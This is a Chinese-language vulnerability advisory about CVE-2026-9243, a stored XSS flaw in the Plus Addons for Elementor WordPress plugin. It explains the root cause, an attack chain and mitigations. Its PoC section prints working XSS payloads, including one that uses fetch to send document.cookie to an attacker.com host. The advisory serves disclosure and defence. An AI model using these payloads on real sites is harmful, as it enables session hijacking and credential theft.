IPBUF安全漏洞报告
English
CVE-2026-9243 CVSS 6.4 中危

CVE-2026-9243 Plus Addons for Elementor插件存储型XSS漏洞

披露日期: 2026-05-29

漏洞信息

漏洞编号
CVE-2026-9243
漏洞类型
存储型XSS (Stored Cross-Site Scripting)
CVSS评分
6.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Plus Addons for Elementor (WordPress插件)

相关标签

存储型XSSWordPress插件ElementorCVE-2026-9243属性注入跨站脚本

漏洞概述

CVE-2026-9243是WordPress插件Plus Addons for Elementor中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于Carousel Anything小工具的carousel_direction参数处理逻辑中,攻击者可利用此漏洞在受影响的页面中注入恶意JavaScript脚本。由于该漏洞为存储型XSS,恶意代码会被永久保存在服务器端,所有访问包含恶意代码页面的用户都会受到攻击。攻击者只需拥有 contributor 级别的账户权限即可实施攻击,无需管理员权限。漏洞根源在于render()函数中虽然使用了esc_attr()进行输出转义,但由于carousel_direction值被放置在未加引号的HTML属性(dir=)中,导致转义措施失效,攻击者可构造恶意属性值突破当前的安全防护。

技术细节

漏洞位于Plus Addons for Elementor插件的tp_carousel_anything.php文件中。在render()函数的第1143行和第1187行附近,代码将用户输入的carousel_direction参数值直接拼接到HTML属性中。具体问题在于dir属性的赋值方式,代码使用了类似dir=$carousel_direction的写法而非dir="$carousel_direction"。虽然代码调用了esc_attr()函数,但该函数仅对引号内的内容进行转义,对于未加引号的属性值,攻击者可以通过构造特定payload如1 onload=alert(document.cookie)来突破属性边界,注入额外的HTML属性和JavaScript事件处理器。攻击者只需在Carousel Anything小工具的设置中提交恶意payload,当管理员或普通用户访问包含该小工具的页面时,恶意脚本即会执行,可能导致会话劫持、凭据窃取等严重后果。

攻击链分析

STEP 1
步骤1: 信息收集
攻击者识别目标网站使用的WordPress版本和Plus Addons for Elementor插件版本,确认版本号<=6.4.15
STEP 2
步骤2: 账户获取
攻击者获取WordPress contributor级别或更高权限的账户,可通过注册功能或社会工程学手段获取
STEP 3
步骤3: 构造恶意Payload
攻击者在Carousel Anything小工具的carousel_direction参数中注入XSS payload,如'1 onload=alert(1)//'
STEP 4
步骤4: 保存恶意内容
攻击者保存包含恶意payload的页面,payload被永久存储在数据库中
STEP 5
步骤5: 触发执行
受害者访问包含恶意小工具的页面时,浏览器解析HTML并执行注入的JavaScript代码
STEP 6
步骤6: 窃取敏感信息
恶意脚本可窃取用户cookie、会话令牌等敏感信息,发送至攻击者控制的服务器

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2026-9243 PoC: Stored XSS via carousel_direction parameter --> <!-- Attack requires contributor-level access or higher in WordPress --> <!-- Step 1: Create or edit a page with Carousel Anything widget --> <!-- Step 2: In widget settings, set carousel_direction to: --> 1 onload=alert(document.cookie)// <!-- Or use more sophisticated payload: --> 1 onfocus=fetch('https://attacker.com/steal?c='+document.cookie) autofocus// <!-- Example HTML injection result (vulnerable output): --> <!-- <div dir=1 onload=alert(document.cookie)// data-widget_type="carousel_anything.default"> --> <!-- The '1' ensures the dir attribute is set, and the payload executes JS after page load -->

影响范围

Plus Addons for Elementor <= 6.4.15

防御指南

临时缓解措施
如果无法立即升级,可临时禁用Carousel Anything小工具,或限制 contributor 角色的内容发布权限。同时可在WAF(Web应用防火墙)中配置规则,检测并阻止包含onload、onerror等事件处理器属性的请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表